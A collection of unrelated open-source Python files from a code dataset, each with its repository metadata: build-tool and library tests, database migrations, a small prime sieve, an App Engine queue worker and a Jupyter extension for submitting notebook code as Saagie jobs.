def test_parent(self):
tree = self.make_branch_and_tree('.', format='development-colo')
tree.bzrdir.create_branch(name='fool/bla')
tree.bzrdir.create_branch(name='foo/bar')
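        # conversely, 'foo' is already the parent of 'foo/bar', so it cannot
        # itself be created as a branch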
self.assertRaises(
errors.AlreadyBranchError, tree.bzrdir.create_branch,
name='foo')
class SampleBzrFormat(bzrdir.BzrFormat):
@classmethod
def get_format_string(cls):
return "First line\n"
class TestBzrFormat(TestCase):
"""Tests for BzrFormat."""
def test_as_string(self):
format = SampleBzrFormat()
format.features = {"foo": "required"}
self.assertEquals(format.as_string(),
"First line\n"
"required foo\n")
format.features["another"] = "optional"
self.assertEquals(format.as_string(),
"First line\n"
"required foo\n"
"optional another\n")
def test_network_name(self):
# The network string should include the feature info
format = SampleBzrFormat()
format.features = {"foo": "required"}
self.assertEquals(
"First line\nrequired foo\n",
format.network_name())
def test_from_string_no_features(self):
# No features
format = SampleBzrFormat.from_string(
"First line\n")
self.assertEquals({}, format.features)
def test_from_string_with_feature(self):
# Proper feature
format = SampleBzrFormat.from_string(
"First line\nrequired foo\n")
self.assertEquals("required", format.features.get("foo"))
def test_from_string_format_string_mismatch(self):
# The first line has to match the format string
self.assertRaises(AssertionError, SampleBzrFormat.from_string,
"Second line\nrequired foo\n")
def test_from_string_missing_space(self):
# At least one space is required in the feature lines
self.assertRaises(errors.ParseFormatError, SampleBzrFormat.from_string,
"First line\nfoo\n")
def test_from_string_with_spaces(self):
# Feature with spaces (in case we add stuff like this in the future)
format = SampleBzrFormat.from_string(
"First line\nrequired foo with spaces\n")
self.assertEquals("required", format.features.get("foo with spaces"))
def test_eq(self):
format1 = SampleBzrFormat()
format1.features = {"nested-trees": "optional"}
format2 = SampleBzrFormat()
format2.features = {"nested-trees": "optional"}
self.assertEquals(format1, format1)
self.assertEquals(format1, format2)
format3 = SampleBzrFormat()
self.assertNotEquals(format1, format3)
def test_check_support_status_optional(self):
# Optional, so silently ignore
format = SampleBzrFormat()
format.features = {"nested-trees": "optional"}
format.check_support_status(True)
self.addCleanup(SampleBzrFormat.unregister_feature, "nested-trees")
SampleBzrFormat.register_feature("nested-trees")
format.check_support_status(True)
def test_check_support_status_required(self):
        # Required but not registered, so trigger an exception
format = SampleBzrFormat()
format.features = {"nested-trees": "required"}
self.assertRaises(errors.MissingFeature, format.check_support_status,
True)
self.addCleanup(SampleBzrFormat.unregister_feature, "nested-trees")
SampleBzrFormat.register_feature("nested-trees")
format.check_support_status(True)
def test_check_support_status_unknown(self):
# treat unknown necessity as required
format = SampleBzrFormat()
format.features = {"nested-trees": "unknown"}
self.assertRaises(errors.MissingFeature, format.check_support_status,
True)
self.addCleanup(SampleBzrFormat.unregister_feature, "nested-trees")
SampleBzrFormat.register_feature("nested-trees")
format.check_support_status(True)
def test_feature_already_registered(self):
# a feature can only be registered once
self.addCleanup(SampleBzrFormat.unregister_feature, "nested-trees")
SampleBzrFormat.register_feature("nested-trees")
self.assertRaises(errors.FeatureAlreadyRegistered,
SampleBzrFormat.register_feature, "nested-trees")
def test_feature_with_space(self):
# spaces are not allowed in feature names
self.assertRaises(ValueError, SampleBzrFormat.register_feature,
"nested trees")
| Distrotech/bzr | bzrlib/tests/test_bzrdir.py | Python | gpl-2.0 | 68,233 | 0.001597 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-07 06:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('news', '0003_auto_20170228_2249'),
]
operations = [
migrations.CreateModel(
name='Location',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('city', models.CharField(default='Testville', max_length=200)),
('state', models.CharField(default='Montigania', max_length=200)),
],
),
migrations.AddField(
model_name='newspaper',
name='next_paper',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'),
),
migrations.AddField(
model_name='newspaper',
name='prev_paper',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'),
),
migrations.AlterField(
model_name='newspaper',
name='date_ended',
field=models.DateField(blank=True, null=True, verbose_name='date ended'),
),
migrations.AlterUniqueTogether(
name='location',
unique_together=set([('city', 'state')]),
),
migrations.AddField(
model_name='newspaper',
name='location',
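            # default=1 assumes a Location row with pk=1 already exists for
            # any pre-existing Newspaper rows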
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='news.Location'),
),
]
| GeorgiaTechDHLab/TOME | news/migrations/0004_auto_20170307_0605.py | Python | bsd-3-clause | 1,746 | 0.004009 |
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
#TODO: Write module doc.
"""
from __future__ import division, unicode_literals
__author__ = 'Shyue Ping Ong'
__copyright__ = 'Copyright 2013, The Materials Virtual Lab'
__version__ = '0.1'
__maintainer__ = 'Shyue Ping Ong'
__email__ = 'ongsp@ucsd.edu'
__date__ = '8/1/15'
import warnings
warnings.warn("pymatgen.io.aseio has been moved pymatgen.io.ase. This stub "
"will be removed in pymatgen 4.0.", DeprecationWarning)
from .ase import *
| Bismarrck/pymatgen | pymatgen/io/aseio.py | Python | mit | 594 | 0.003367 |
#!/usr/bin/env python3
"""tests.test_io.test_read_gfa.py: tests for exfi.io.read_gfa.py"""
from unittest import TestCase, main
from exfi.io.read_gfa import read_gfa1
from tests.io.gfa1 import \
HEADER, \
SEGMENTS_EMPTY, SEGMENTS_SIMPLE, SEGMENTS_COMPLEX, \
SEGMENTS_COMPLEX_SOFT, SEGMENTS_COMPLEX_HARD, \
LINKS_EMPTY, LINKS_SIMPLE, LINKS_COMPLEX, \
CONTAINMENTS_EMPTY, CONTAINMENTS_SIMPLE, CONTAINMENTS_COMPLEX, \
PATHS_EMPTY, PATHS_SIMPLE, PATHS_COMPLEX, \
GFA1_EMPTY_FN, GFA1_SIMPLE_FN, GFA1_COMPLEX_FN, \
GFA1_COMPLEX_SOFT_FN, GFA1_COMPLEX_HARD_FN
class TestReadGFA1(TestCase):
"""Tests for exfi.io.read_gfa.read_gfa1"""
def test_empty(self):
"""exfi.io.read_gfa.read_gfa1: empty case"""
gfa1 = read_gfa1(GFA1_EMPTY_FN)
self.assertTrue(gfa1['header'].equals(HEADER))
self.assertTrue(gfa1['segments'].equals(SEGMENTS_EMPTY))
self.assertTrue(gfa1['links'].equals(LINKS_EMPTY))
self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_EMPTY))
self.assertTrue(gfa1['paths'].equals(PATHS_EMPTY))
def test_simple(self):
"""exfi.io.read_gfa.read_gfa1: simple case"""
gfa1 = read_gfa1(GFA1_SIMPLE_FN)
self.assertTrue(gfa1['header'].equals(HEADER))
self.assertTrue(gfa1['segments'].equals(SEGMENTS_SIMPLE))
self.assertTrue(gfa1['links'].equals(LINKS_SIMPLE))
self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_SIMPLE))
self.assertTrue(gfa1['paths'].equals(PATHS_SIMPLE))
def test_complex(self):
"""exfi.io.read_gfa.read_gfa1: complex case"""
gfa1 = read_gfa1(GFA1_COMPLEX_FN)
self.assertTrue(gfa1['header'].equals(HEADER))
self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX))
self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX))
self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX))
self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX))
def test_complex_soft(self):
"""exfi.io.read_gfa.read_gfa1: complex and soft masking case"""
gfa1 = read_gfa1(GFA1_COMPLEX_SOFT_FN)
self.assertTrue(gfa1['header'].equals(HEADER))
self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX_SOFT))
self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX))
self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX))
self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX))
def test_complex_hard(self):
"""exfi.io.read_gfa.read_gfa1: complex and hard masking case"""
gfa1 = read_gfa1(GFA1_COMPLEX_HARD_FN)
self.assertTrue(gfa1['header'].equals(HEADER))
self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX_HARD))
self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX))
self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX))
self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX))
if __name__ == '__main__':
main()
| jlanga/exfi | tests/test_io/test_read_gfa.py | Python | mit | 2,975 | 0.000672 |
# coding=utf-8
import json
import codecs
import os
import transaction
from nextgisweb import DBSession
from nextgisweb.vector_layer import VectorLayer
from nextgisweb_compulink.compulink_admin.model import BASE_PATH
def update_actual_lyr_names(args):
db_session = DBSession()
transaction.manager.begin()
# what update
upd_real_layers = ['real_access_point', 'real_fosc', 'real_optical_cable', 'real_optical_cable_point',
'real_optical_cross', 'real_special_transition', 'real_special_transition_point']
upd_real_lyr_names = {}
# new names (already in templates!)
real_layers_template_path = os.path.join(BASE_PATH, 'real_layers_templates/')
for up_lyr_name in upd_real_layers:
with codecs.open(os.path.join(real_layers_template_path, up_lyr_name + '.json'), encoding='utf-8') as json_file:
json_layer_struct = json.load(json_file, encoding='utf-8')
new_name = json_layer_struct['resource']['display_name']
upd_real_lyr_names[up_lyr_name] = new_name
    # apply the new display names
resources = db_session.query(VectorLayer).filter(VectorLayer.keyname.like('real_%')).all()
for vec_layer in resources:
lyr_name = vec_layer.keyname
if not lyr_name:
continue
for up_lyr_name in upd_real_lyr_names.keys():
if lyr_name.startswith(up_lyr_name) and not lyr_name.startswith(up_lyr_name + '_point'): # ugly!
vec_layer.display_name = upd_real_lyr_names[up_lyr_name]
print '%s updated' % lyr_name
break
transaction.manager.commit()
db_session.close()
|
nextgis/nextgisweb_compulink
|
nextgisweb_compulink/db_migrations/update_actual_lyr_names.py
|
Python
|
gpl-2.0
| 1,646
| 0.003645
|
#
# SPDX-License-Identifier: MIT
#
import os
import shutil
import unittest
from oeqa.core.utils.path import remove_safe
from oeqa.sdk.case import OESDKTestCase
from oeqa.utils.subprocesstweak import errors_have_output
errors_have_output()
class GccCompileTest(OESDKTestCase):
td_vars = ['MACHINE']
    @classmethod
    def setUpClass(cls):
        files = {'test.c' : cls.tc.files_dir, 'test.cpp' : cls.tc.files_dir,
                 'testsdkmakefile' : cls.tc.sdk_files_dir}
        for f in files:
            shutil.copyfile(os.path.join(files[f], f),
                            os.path.join(cls.tc.sdk_dir, f))
def setUp(self):
machine = self.td.get("MACHINE")
if not (self.tc.hasHostPackage("packagegroup-cross-canadian-%s" % machine) or
self.tc.hasHostPackage("^gcc-", regex=True)):
raise unittest.SkipTest("GccCompileTest class: SDK doesn't contain a cross-canadian toolchain")
def test_gcc_compile(self):
self._run('$CC %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir))
def test_gpp_compile(self):
self._run('$CXX %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir))
def test_gpp2_compile(self):
self._run('$CXX %s/test.cpp -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir))
def test_make(self):
self._run('cd %s; make -f testsdkmakefile' % self.tc.sdk_dir)
    @classmethod
    def tearDownClass(cls):
        files = [os.path.join(cls.tc.sdk_dir, f)
                 for f in ['test.c', 'test.cpp', 'test.o', 'test',
                           'testsdkmakefile']]
        for f in files:
            remove_safe(f)
|
schleichdi2/OPENNFR-6.3-CORE
|
opennfr-openembedded-core/meta/lib/oeqa/sdk/cases/gcc.py
|
Python
|
gpl-2.0
| 1,658
| 0.009047
|
#!/usr/bin/env python3
print('Content-type: text/html')
print()
primes = [2, *range(3, 10001, 2)]
for div in primes:
    # Start scanning just after the current divisor (not at index div + 1,
    # which confuses the divisor's value with its position in the list).
    idx = primes.index(div) + 1
    while idx < len(primes):
        if primes[idx] % div == 0:
            # Deleting shifts the following element into this slot, so only
            # advance the index when nothing was removed.
            del primes[idx]
        else:
            idx += 1
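# For comparison (a sketch, not part of the original exercise): the classic
# boolean-array Sieve of Eratosthenes computes the same list without repeated
# list deletions:
#
#   sieve = [True] * 10001
#   sieve[0] = sieve[1] = False
#   for i in range(2, 101):            # 101 > sqrt(10000)
#       if sieve[i]:
#           for j in range(i * i, 10001, i):
#               sieve[j] = False
#   primes = [i for i, ok in enumerate(sieve) if ok]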
print(primes)
|
JulianNicholls/Complete-Web-Course-2.0
|
13-Python/challenge2.py
|
Python
|
mit
| 249
| 0.012048
|
#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/SWIG/SWIGOUTDIR.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that use of the $SWIGOUTDIR variable causes SCons to recognize
that Java files are created in the specified output directory.
"""
import TestSCons
test = TestSCons.TestSCons()
swig = test.where_is('swig')
if not swig:
test.skip_test('Can not find installed "swig", skipping test.\n')
where_java_include=test.java_where_includes()
if not where_java_include:
test.skip_test('Can not find installed Java include files, skipping test.\n')
test.write(['SConstruct'], """\
env = Environment(tools = ['default', 'swig'],
CPPPATH=%(where_java_include)s,
)
Java_foo_interface = env.SharedLibrary(
'Java_foo_interface',
'Java_foo_interface.i',
SWIGOUTDIR = 'java/build dir',
SWIGFLAGS = '-c++ -java -Wall',
SWIGCXXFILESUFFIX = "_wrap.cpp")
""" % locals())
test.write('Java_foo_interface.i', """\
%module foopack
""")
# SCons should realize that it needs to create the "java/build dir"
# subdirectory to hold the generated .java files.
test.run(arguments = '.')
test.must_exist('java/build dir/foopackJNI.java')
test.must_exist('java/build dir/foopack.java')
# SCons should remove the built .java files.
test.run(arguments = '-c')
test.must_not_exist('java/build dir/foopackJNI.java')
test.must_not_exist('java/build dir/foopack.java')
# SCons should realize it needs to rebuild the removed .java files.
test.not_up_to_date(arguments = '.')
test.must_exist('java/build dir/foopackJNI.java')
test.must_exist('java/build dir/foopack.java')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
EmanueleCannizzaro/scons
|
test/SWIG/SWIGOUTDIR.py
|
Python
|
mit
| 2,897
| 0.005178
|
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from selenium import webdriver
from selenium.test.selenium.webdriver.common import select_class_tests
from selenium.test.selenium.webdriver.common.webserver import SimpleWebServer
def setup_module(module):
webserver = SimpleWebServer()
webserver.start()
FirefoxSelectElementHandlingTests.webserver = webserver
FirefoxSelectElementHandlingTests.driver = webdriver.Firefox()
class FirefoxSelectElementHandlingTests(select_class_tests.WebDriverSelectSupportTests):
pass
def teardown_module(module):
FirefoxSelectElementHandlingTests.driver.quit()
FirefoxSelectElementHandlingTests.webserver.stop()
|
jerome-jacob/selenium
|
py/test/selenium/webdriver/firefox/ff_select_support_class_tests.py
|
Python
|
apache-2.0
| 1,419
| 0.002819
|
from google.appengine.ext import webapp
from google.appengine.ext.webapp import util
from google.appengine.api.labs import taskqueue
from google.appengine.api import memcache
from lifestream import *
class LifeStreamQueueWorker(webapp.RequestHandler):
def get(self):
memcache.set('fresh_count', 0)
indexes = LifeStream.instance().indexes
for index in indexes:
taskqueue.add(url='/app_worker/task', method='GET', params={'index':index})
taskqueue.add(url='/app_worker/refresh', method='GET', countdown=10)
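# Illustrative flow: /app_worker/queue fans out one /app_worker/task per feed
# index via the task queue, then schedules /app_worker/refresh 10 seconds
# later to rebuild the merged stream.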
class LifeStreamTaskWorker(webapp.RequestHandler):
def get(self):
index = int(self.request.get('index'))
LifeStream.update_feed(index)
class LifeStreamRefreshWorker(webapp.RequestHandler):
def get(self):
LifeStream.refresh_stream()
def main():
application = webapp.WSGIApplication([
('/app_worker/queue', LifeStreamQueueWorker),
('/app_worker/task', LifeStreamTaskWorker),
('/app_worker/refresh', LifeStreamRefreshWorker)
], debug=True)
util.run_wsgi_app(application)
if __name__ == '__main__':
main()
|
billychow/simplelifestream
|
worker.py
|
Python
|
mit
| 1,047
| 0.029608
|
from functools import wraps
import json
import os
import traceback
import validators
from jinja2 import Environment, PackageLoader
from notebook.utils import url_path_join
from notebook.base.handlers import IPythonHandler
import requests
from requests.auth import HTTPBasicAuth
env = Environment(
loader=PackageLoader('saagie', 'jinja2'),
)
SAAGIE_ROOT_URL = os.environ.get("SAAGIE_ROOT_URL", None)
SAAGIE_USERNAME = None
PLATFORMS_URL = None
SAAGIE_BASIC_AUTH_TOKEN = None
JOBS_URL_PATTERN = None
JOB_URL_PATTERN = None
JOB_UPGRADE_URL_PATTERN = None
SCRIPT_UPLOAD_URL_PATTERN = None
def get_absolute_saagie_url(saagie_url):
if saagie_url.startswith('/'):
return SAAGIE_ROOT_URL + saagie_url
return saagie_url
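# e.g. get_absolute_saagie_url('/api/v1/platform') prepends SAAGIE_ROOT_URL,
# while already-absolute URLs are returned unchanged.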
class ResponseError(Exception):
def __init__(self, status_code):
self.status_code = status_code
super(ResponseError, self).__init__(status_code)
class SaagieHandler(IPythonHandler):
def handle_request(self, method):
data = {k: v[0].decode() for k, v in self.request.arguments.items()}
if 'view' not in data:
self.send_error(404)
return
view_name = data.pop('view')
notebook_path = data.pop('notebook_path', None)
notebook_json = data.pop('notebook_json', None)
notebook = Notebook(notebook_path, notebook_json)
try:
template_name, template_data = views.render(
view_name, notebook=notebook, data=data, method=method)
except ResponseError as e:
self.send_error(e.status_code)
return
except:
template_name = 'internal_error.html'
template_data = {'error': traceback.format_exc()}
self.set_status(500)
template_data.update(
notebook=notebook,
)
template = env.get_template(template_name)
self.finish(template.render(template_data))
def get(self):
self.handle_request('GET')
def post(self):
self.handle_request('POST')
def check_xsrf_cookie(self):
return
class SaagieCheckHandler(IPythonHandler):
def get(self):
self.finish()
class SaagieJobRun:
def __init__(self, job, run_data):
self.job = job
self.id = run_data['id']
self.status = run_data['status']
self.stderr = run_data.get('logs_err', '')
self.stdout = run_data.get('logs_out', '')
class SaagieJob:
@classmethod
def from_id(cls, notebook, platform_id, job_id):
return SaagieJob(
notebook,
requests.get(JOB_URL_PATTERN % (platform_id, job_id), auth=SAAGIE_BASIC_AUTH_TOKEN).json())
def __init__(self, notebook, job_data):
self.notebook = notebook
self.data = job_data
self.platform_id = job_data['platform_id']
self.capsule_type = job_data['capsule_code']
self.id = job_data['id']
self.name = job_data['name']
self.last_run = None
def set_as_current(self):
self.notebook.current_job = self
@property
def url(self):
return (JOBS_URL_PATTERN + '/%s') % (self.platform_id, self.id)
@property
def admin_url(self):
return get_absolute_saagie_url('/#/manager/%s/job/%s'
% (self.platform_id, self.id))
@property
def logs_url(self):
return self.admin_url + '/logs'
@property
def is_started(self):
return self.last_run is not None
def fetch_logs(self):
job_data = requests.get(self.url, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
run_data = job_data.get('last_instance')
if run_data is None or run_data['status'] not in ('SUCCESS', 'FAILED'):
return
run_data = requests.get(
get_absolute_saagie_url('/api/v1/jobtask/%s'
% run_data['id']), auth=SAAGIE_BASIC_AUTH_TOKEN).json()
self.last_run = SaagieJobRun(self, run_data)
@property
def details_template_name(self):
return 'include/python_job_details.html'
def __str__(self):
return self.name
def __eq__(self, other):
if other is None:
return False
return self.platform_id == other.platform_id and self.id == other.id
def __lt__(self, other):
if other is None:
return False
return self.id < other.id
class SaagiePlatform:
SUPPORTED_CAPSULE_TYPES = {'python'}
def __init__(self, notebook, platform_data):
self.notebook = notebook
self.id = platform_data['id']
self.name = platform_data['name']
self.capsule_types = {c['code'] for c in platform_data['capsules']}
@property
def is_supported(self):
return not self.capsule_types.isdisjoint(self.SUPPORTED_CAPSULE_TYPES)
def get_jobs(self):
if not self.is_supported:
return []
jobs_data = requests.get(JOBS_URL_PATTERN % self.id, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
return [SaagieJob(self.notebook, job_data) for job_data in jobs_data
if job_data['category'] == 'processing' and
job_data['capsule_code'] in self.SUPPORTED_CAPSULE_TYPES]
def __eq__(self, other):
return self.id == other.id
class Notebook:
CACHE = {}
    def __new__(cls, path, json_data):
        if path in cls.CACHE:
            return cls.CACHE[path]
        cls.CACHE[path] = new = super(Notebook, cls).__new__(cls)
        return new
def __init__(self, path, json_data):
if path is None:
path = 'Untitled.ipynb'
if json_data is None:
json_data = json.dumps({
'cells': [],
'metadata': {'kernelspec': {'name': 'python3'}}})
self.path = path
self.json = json.loads(json_data)
# In cached instances, current_job is already defined.
if not hasattr(self, 'current_job'):
self.current_job = None
@property
def name(self):
return os.path.splitext(os.path.basename(self.path))[0]
@property
def kernel_name(self):
return self.json['metadata']['kernelspec']['name']
@property
def kernel_display_name(self):
return self.json['metadata']['kernelspec']['display_name']
def get_code_cells(self):
return [cell['source'] for cell in self.json['cells']
if cell['cell_type'] == 'code']
def get_code(self, indices=None):
cells = self.get_code_cells()
if indices is None:
indices = list(range(len(cells)))
return '\n\n\n'.join([cells[i] for i in indices])
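    # e.g. notebook.get_code([0, 2]) joins the first and third code cells,
    # separated by blank lines; with indices=None every code cell is included.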
def get_platforms(self):
return [SaagiePlatform(self, platform_data)
for platform_data in requests.get(PLATFORMS_URL, auth=SAAGIE_BASIC_AUTH_TOKEN).json()]
class ViewsCollection(dict):
def add(self, func):
self[func.__name__] = func
return func
def render(self, view_name, notebook, data=None, method='GET', **kwargs):
if data is None:
data = {}
try:
view = views[view_name]
except KeyError:
raise ResponseError(404)
template_data = view(method, notebook, data, **kwargs)
if isinstance(template_data, tuple):
template_name, template_data = template_data
else:
template_name = view.__name__ + '.html'
return template_name, template_data
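# Illustrative dispatch: a view registered via @views.add and named 'modal'
# renders 'modal.html' by default, unless it returns an explicit
# (template_name, template_data) tuple.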
views = ViewsCollection()
@views.add
def modal(method, notebook, data):
return {}
def clear_basic_auth_token():
global SAAGIE_BASIC_AUTH_TOKEN
SAAGIE_BASIC_AUTH_TOKEN = None
# Init an empty Basic Auth token on first launch
clear_basic_auth_token()
def is_logged():
if SAAGIE_ROOT_URL is None or SAAGIE_BASIC_AUTH_TOKEN is None:
return False
else:
# Check if Basic token is still valid
is_logged_in = False
try:
response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current', auth=SAAGIE_BASIC_AUTH_TOKEN, allow_redirects=False)
is_logged_in = response.ok
except (requests.ConnectionError, requests.RequestException, requests.HTTPError, requests.Timeout) as err:
            print('Error while trying to connect to Saagie:', err)
if is_logged_in is not True:
# Remove Basic Auth token from globals. It will force a new login phase.
clear_basic_auth_token()
return is_logged_in
def define_globals(saagie_root_url, saagie_username):
if saagie_root_url is not None:
global SAAGIE_ROOT_URL
global SAAGIE_USERNAME
global PLATFORMS_URL
global JOBS_URL_PATTERN
global JOB_URL_PATTERN
global JOB_UPGRADE_URL_PATTERN
global SCRIPT_UPLOAD_URL_PATTERN
SAAGIE_USERNAME = saagie_username
SAAGIE_ROOT_URL = saagie_root_url.strip("/")
PLATFORMS_URL = SAAGIE_ROOT_URL + '/api/v1/platform'
JOBS_URL_PATTERN = PLATFORMS_URL + '/%s/job'
JOB_URL_PATTERN = JOBS_URL_PATTERN + '/%s'
JOB_UPGRADE_URL_PATTERN = JOBS_URL_PATTERN + '/%s/version'
SCRIPT_UPLOAD_URL_PATTERN = JOBS_URL_PATTERN + '/upload'
@views.add
def login_form(method, notebook, data):
if method == 'POST':
# check if the given Saagie URL is well formed
if not validators.url(data['saagie_root_url']):
return {'error': 'Invalid URL', 'saagie_root_url': data['saagie_root_url'] or '', 'username': data['username'] or ''}
define_globals(data['saagie_root_url'], data['username'])
try:
basic_token = HTTPBasicAuth(data['username'], data['password'])
current_user_response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current', auth=basic_token, allow_redirects=False)
if current_user_response.ok:
# Login succeeded, keep the basic token for future API calls
global SAAGIE_BASIC_AUTH_TOKEN
SAAGIE_BASIC_AUTH_TOKEN = basic_token
except (requests.ConnectionError, requests.RequestException, requests.HTTPError, requests.Timeout) as err:
            print('Error while trying to connect to Saagie:', err)
return {'error': 'Connection error', 'saagie_root_url': SAAGIE_ROOT_URL, 'username': SAAGIE_USERNAME or ''}
if SAAGIE_BASIC_AUTH_TOKEN is not None:
return views.render('capsule_type_chooser', notebook)
return {'error': 'Invalid URL, username or password.', 'saagie_root_url': SAAGIE_ROOT_URL, 'username': SAAGIE_USERNAME or ''}
if is_logged():
return views.render('capsule_type_chooser', notebook)
return {'error': None, 'saagie_root_url': SAAGIE_ROOT_URL or '', 'username': SAAGIE_USERNAME or ''}
def login_required(view):
@wraps(view)
def inner(method, notebook, data, *args, **kwargs):
if not is_logged():
return views.render('login_form', notebook)
return view(method, notebook, data, *args, **kwargs)
return inner
@views.add
@login_required
def capsule_type_chooser(method, notebook, data):
return {'username': SAAGIE_USERNAME}
def get_job_form(method, notebook, data):
context = {'platforms': notebook.get_platforms()}
context['values'] = ({'current': {'options': {}}} if notebook.current_job is None
else notebook.current_job.data)
return context
def create_job_base_data(data):
return {
'platform_id': data['saagie-platform'],
'category': 'processing',
'name': data['job-name'],
'description': data['description'],
'current': {
'cpu': data['cpu'],
'disk': data['disk'],
'memory': data['ram'],
'isInternalSubDomain': False,
'isInternalPort': False,
'options': {}
}
}
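# create_job_base_data reads the posted form fields 'saagie-platform',
# 'job-name', 'description', 'cpu', 'disk' and 'ram' (see the dict above).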
def upload_python_script(notebook, data):
code = notebook.get_code(map(int, data.get('code-lines', '').split('|')))
files = {'file': (data['job-name'] + '.py', code)}
return requests.post(
SCRIPT_UPLOAD_URL_PATTERN % data['saagie-platform'],
files=files, auth=SAAGIE_BASIC_AUTH_TOKEN).json()['fileName']
@views.add
@login_required
def python_job_form(method, notebook, data):
if method == 'POST':
platform_id = data['saagie-platform']
job_data = create_job_base_data(data)
job_data['capsule_code'] = 'python'
job_data['always_email'] = False
job_data['manual'] = True
job_data['retry'] = ''
current = job_data['current']
current['options']['language_version'] = data['language-version']
current['releaseNote'] = data['release-note']
current['template'] = data['shell-command']
current['file'] = upload_python_script(notebook, data)
new_job_data = requests.post(JOBS_URL_PATTERN % platform_id,
json=job_data, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
job = SaagieJob(notebook, new_job_data)
job.set_as_current()
return views.render('starting_job', notebook, {'job': job})
context = get_job_form(method, notebook, data)
context['action'] = '/saagie?view=python_job_form'
context['username'] = SAAGIE_USERNAME
return context
@views.add
@login_required
def update_python_job(method, notebook, data):
if method == 'POST':
job = notebook.current_job
platform_id = job.platform_id
data['saagie-platform'] = platform_id
data['job-name'] = job.name
data['description'] = ''
current = create_job_base_data(data)['current']
current['options']['language_version'] = data['language-version']
current['releaseNote'] = data['release-note']
current['template'] = data['shell-command']
current['file'] = upload_python_script(notebook, data)
requests.post(JOB_UPGRADE_URL_PATTERN % (platform_id, job.id),
json={'current': current}, auth=SAAGIE_BASIC_AUTH_TOKEN)
job.last_run = None
return views.render('starting_job', notebook, {'job': job})
context = get_job_form(method, notebook, data)
context['action'] = '/saagie?view=update_python_job'
context['username'] = SAAGIE_USERNAME
return context
@views.add
@login_required
def select_python_job(method, notebook, data):
if method == 'POST':
platform_id, job_id = data['job'].split('-')
notebook.current_job = SaagieJob.from_id(notebook, platform_id, job_id)
return views.render('update_python_job', notebook, data)
jobs_by_platform = []
for platform in notebook.get_platforms():
jobs = platform.get_jobs()
if jobs:
jobs_by_platform.append((platform,
list(sorted(jobs, reverse=True))))
return {'jobs_by_platform': jobs_by_platform,
'action': '/saagie?view=select_python_job', 'username': SAAGIE_USERNAME}
@views.add
@login_required
def unsupported_kernel(method, notebook, data):
return {'username': SAAGIE_USERNAME}
@views.add
@login_required
def starting_job(method, notebook, data):
job = notebook.current_job
job.fetch_logs()
if job.is_started:
return views.render('started_job', notebook, {'job': job})
return {'job': job, 'username': SAAGIE_USERNAME}
@views.add
@login_required
def started_job(method, notebook, data):
return {'job': notebook.current_job, 'username': SAAGIE_USERNAME}
@views.add
def logout(method, notebook, data):
global SAAGIE_BASIC_AUTH_TOKEN
global SAAGIE_ROOT_URL
global SAAGIE_USERNAME
SAAGIE_BASIC_AUTH_TOKEN = None
SAAGIE_ROOT_URL = None
SAAGIE_USERNAME = None
